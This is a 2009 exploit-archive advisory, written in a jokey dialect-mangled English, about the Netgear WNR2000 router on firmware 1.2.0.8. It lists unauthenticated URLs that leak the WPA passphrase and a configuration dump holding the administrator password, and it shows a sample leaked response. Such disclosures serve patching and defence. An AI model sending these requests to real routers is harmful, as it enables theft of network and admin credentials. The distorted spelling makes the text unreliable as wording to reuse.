Netgear WNR2000 FW 1.2.0.8 Information Disclsoure Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Netgear WNR2000 FW 1.2.0.8 Information Disclsoure Vulnerabilities
# Published : 2009-08-24
# Author : Jean Trolleur
# Previous Title : ProFTP 2.9 (welcome message) Remote Buffer Overflow Exploit (meta)
# Next Title : NaviCopa Web Server 3.01 Remote Buffer Overflow Exploit

Dere is several mino' vulnerabilities on de Netgear WNR2000 wireless
routa' runnin' firmware 1.2.0.8.

1. Unaudenticated disclosho' man uh WPA/WPA2 passwo'd, dig dis: Simply
request widout audenticashun:

http://netgear/router-info.htm
http://netgear/cgi-bin/router-info.htm

De routa' gots'ta respond wid:

DeviceID:WNR2000;
HardwareVersion:;
FirmwareVersion:V1.2.0.8NA;
WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf

2. Unaudenticated disclosho' man uh administrato' passwo'd Simply
request widout audenticashun:

http://netgear/cgi-bin/NETGEAR_WNR2000.cfg

Skip de fust 128 bytes and ya' gots some tar dump uh de stashsystem.
WORD! Reverse engineerin' de weak admin passwo'd audenticashun scheme
be left as an 'esercise t'de eyeballer. Ah be baaad...

# www.Syue.com [2009-08-24]